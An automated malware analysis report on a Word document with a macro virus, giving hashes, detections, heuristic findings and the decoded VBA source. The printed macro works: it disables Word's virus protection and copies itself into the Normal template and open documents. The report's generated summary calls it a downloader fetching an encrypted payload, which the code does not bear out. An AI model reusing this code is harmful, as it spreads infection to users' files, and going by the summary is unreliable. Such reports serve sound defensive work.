Office (OLE) malware analysis — malicious · 4b784b448f0ddc8a

MALICIOUS

Office (OLE)

105.5 KB Created: 2018-11-19 02:07:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: a4a9082db8703ff7301308a4915336e6 SHA-1: ea1c6d32f6dc0e3c5f19aa3193a2fe498a547790 SHA-256: 4b784b448f0ddc8a1722d72ea6311b143287503bb19803c35f76789011045eab

170 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This document contains VBA macros, specifically a Document_Open macro designed to execute code upon opening. The macro attempts to replace its own code with content from the first 20 lines of the `ThisDocument` module, suggesting it's a downloader or dropper. The presence of a 'Password-protected archive handoff' heuristic indicates the macro may be intended to decrypt or retrieve a payload from an encrypted archive. The ClamAV detection further confirms its malicious nature.

Heuristics 6

ClamAV: Doc.Macro.APMPKILL-6097118-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0

Heap-spray pattern detected high SC_HEAP_SPRAY

Repeated 0x41 (A) bytes found

Disassembly

Attempted x86 opcode disassembly

0000A722  41                inc ecx
0000A723  41                inc ecx
0000A724  41                inc ecx
0000A725  41                inc ecx
0000A726  41                inc ecx
0000A727  41                inc ecx
0000A728  41                inc ecx
0000A729  41                inc ecx
0000A72A  41                inc ecx
0000A72B  41                inc ecx
0000A72C  41                inc ecx
0000A72D  41                inc ecx
0000A72E  41                inc ecx
0000A72F  41                inc ecx
0000A730  41                inc ecx
0000A731  41                inc ecx
0000A732  41                inc ecx
0000A733  41                inc ecx
0000A734  41                inc ecx
0000A735  41                inc ecx
0000A736  41                inc ecx
0000A737  41                inc ecx
0000A738  41                inc ecx
0000A739  41                inc ecx
0000A73A  41                inc ecx
0000A73B  41                inc ecx
0000A73C  41                inc ecx
0000A73D  41                inc ecx
0000A73E  41                inc ecx
0000A73F  41                inc ecx
0000A740  41                inc ecx
0000A741  41                inc ecx
0000A742  41                inc ecx
0000A743  41                inc ecx
0000A744  41                inc ecx
0000A745  41                inc ecx
0000A746  41                inc ecx
0000A747  41                inc ecx
0000A748  41                inc ecx
0000A749  41                inc ecx
0000A74A  41                inc ecx
0000A74B  41                inc ecx
0000A74C  41                inc ecx
0000A74D  41                inc ecx
0000A74E  41                inc ecx
0000A74F  41                inc ecx
0000A750  41                inc ecx
0000A751  41                inc ecx
0000A752  41                inc ecx
0000A753  41                inc ecx
0000A754  41                inc ecx
0000A755  41                inc ecx
0000A756  41                inc ecx
0000A757  41                inc ecx
0000A758  41                inc ecx
0000A759  41                inc ecx
0000A75A  41                inc ecx
0000A75B  41                inc ecx
0000A75C  41                inc ecx
0000A75D  41                inc ecx
0000A75E  41                inc ecx
0000A75F  41                inc ecx
0000A760  41                inc ecx
0000A761  41                inc ecx
0000A762  41                inc ecx
0000A763  41                inc ecx
0000A764  41                inc ecx
0000A765  41                inc ecx
0000A766  41                inc ecx
0000A767  41                inc ecx
0000A768  41                inc ecx
0000A769  41                inc ecx
0000A76A  41                inc ecx
0000A76B  41                inc ecx
0000A76C  41                inc ecx
0000A76D  41                inc ecx
0000A76E  41                inc ecx
0000A76F  41                inc ecx
0000A770  41                inc ecx
0000A771  41                inc ecx
0000A772  41                inc ecx
0000A773  41                inc ecx
0000A774  41                inc ecx
0000A775  41                inc ecx
0000A776  41                inc ecx
0000A777  41                inc ecx
0000A778  41                inc ecx
0000A779  41                inc ecx
0000A77A  41                inc ecx
0000A77B  41                inc ecx
0000A77C  41                inc ecx
0000A77D  41                inc ecx
0000A77E  41                inc ecx
0000A77F  41                inc ecx
0000A780  41                inc ecx
0000A781  41                inc ecx

Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
'KILL
Private Sub Document_Open()
   On Error Resume Next
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1086 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1086 bytes
SHA-256: `a8e47de383d7047002ffbc39050de92bda3cb4985642e0f4f5ddf8ca290054e7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "AztSiw1, 0, 0, AZTSIWLib, AztSiw" 'APMP 'KILL Private Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule With Host If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then .DeleteLines 1, .CountOfLines .InsertLines 1, MyCode If ThisDocument = NormalTemplate Then _ ActiveDocument.SaveAs ActiveDocument.FullName End If End With End Sub

SHA-256: a8e47de383d7047002ffbc39050de92bda3cb4985642e0f4f5ddf8ca290054e7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "AztSiw1, 0, 0, AZTSIWLib, AztSiw"
'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next
   Application.DisplayStatusBar = False
   Options.VirusProtection = False
   Options.SaveNormalPrompt = False
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.